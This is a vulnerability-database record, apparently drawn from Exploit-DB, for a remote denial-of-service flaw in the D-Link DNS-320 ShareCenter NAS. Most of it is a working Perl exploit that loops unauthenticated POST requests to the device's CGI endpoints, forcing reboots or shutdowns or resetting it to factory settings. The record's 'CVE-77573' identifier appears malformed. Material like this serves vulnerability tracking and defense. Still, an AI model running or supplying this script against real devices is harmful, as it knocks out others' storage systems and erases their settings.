ID

VAR-E-201112-0378


EDB ID

18199


TITLE

D-Link DNS-320 ShareCenter - Remote Reboot/Shutdown/Reset (Denial of Service) - Hardware dos Exploit

Trust: 0.6

sources: EXPLOIT-DB: 18199

DESCRIPTION

D-Link DNS-320 ShareCenter - Remote Reboot/Shutdown/Reset (Denial of Service). CVE-77573. DoS exploit for the Hardware platform.

Trust: 0.6

sources: EXPLOIT-DB: 18199

AFFECTED PRODUCTS

vendor: d link | model: dns-320 sharecenter | scope: - | version: -

Trust: 1.0

vendor: sharecenter | model: d-link dns-320 | scope: - | version: -

Trust: 0.6

sources: EXPLOIT-DB: 18199 // EDBNET: 40652

EXPLOIT

#!/usr/bin/perl
#
# Title: ShareCenter D-Link DNS-320 remote reboot/shutdown/reset (DoS).
# Type: Hardware
# Remote: yes
# Author: rigan - imrigan [sobachka] gmail.com
#
# Tested on:
# Firmware : DNS320-v2.00b06
#
# Security flaws:
# dsk_mgr.cgi allows executing a reboot via a POST request with the parameter cmd=FMT_restart.
# system_mgr.cgi allows executing a reboot via a POST request with the parameter cmd=cgi_restart or cmd=cgi_reboot.
# system_mgr.cgi allows executing a shutdown via a POST request with the parameter cmd=cgi_shutdown.
# wizard_mgr.cgi allows resetting the firmware to default settings via a POST request with the parameter cmd=cgi_wizard.

use LWP::UserAgent;

print "[*] ShareCenter D-Link DNS-320 Remote Dos Exploit\n";

if (@ARGV != 3){ &usage; }

while (@ARGV > 0){
    $ip = shift(@ARGV);
    $port = shift(@ARGV);
    $mode = shift(@ARGV);
}

@cgi = ("dsk_mgr.cgi", "system_mgr.cgi", "wizard_mgr.cgi", "system_mgr.cgi");
@cmd = ("cmd=FMT_restart", "cmd=cgi_restart", "cmd=cgi_wizard", "cmd=cgi_shutdown");

$url = "http://".$ip.":".$port."/cgi-bin/".$cgi[$mode];

print "[*] DoS............................................. \n";
while(1){
    my $ua = new LWP::UserAgent;
    my $req = HTTP::Request->new(POST=>$url);
    $req->content_type('application/x-www-form-urlencoded');
    $req->content($cmd[$mode]);
    my $res = $ua->request($req);
}

sub usage(){
    print "Usage: perl dlink.pl [target ip] [port] [0,1,2,3] \n";
    print "================================================= \n";
    print "0 - dsk_mgr.cgi cmd=FMT_restart [Reboot] \n";
    print "1 - system_mgr.cgi cmd=cgi_restart [Reboot] \n";
    print "2 - wizard_mgr.cgi cmd=cgi_wizard [Reset] \n";
    print "3 - system_mgr.cgi cmd=cgi_shutdown [Shutdown] \n";
    exit;
}

Trust: 1.0

sources: EXPLOIT-DB: 18199

EXPLOIT LANGUAGE

pl

Trust: 0.6

sources: EXPLOIT-DB: 18199

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 18199

TYPE

Remote Reboot/Shutdown/Reset (Denial of Service)

Trust: 1.0

sources: EXPLOIT-DB: 18199

CREDITS

rigan

Trust: 0.6

sources: EXPLOIT-DB: 18199

EXTERNAL IDS

db: EXPLOIT-DB | id: 18199

Trust: 1.6

db: EDBNET | id: 40652

Trust: 0.6

sources: EXPLOIT-DB: 18199 // EDBNET: 40652

REFERENCES

url: https://www.exploit-db.com/exploits/18199/

Trust: 0.6

sources: EDBNET: 40652

SOURCES

db: EXPLOIT-DB | id: 18199
db: EDBNET | id: 40652

LAST UPDATE DATE

2022-07-27T09:54:37.919000+00:00


SOURCES RELEASE DATE

db: EXPLOIT-DB | id: 18199 | date: 2011-12-05T00:00:00
db: EDBNET | id: 40652 | date: 2011-12-05T00:00:00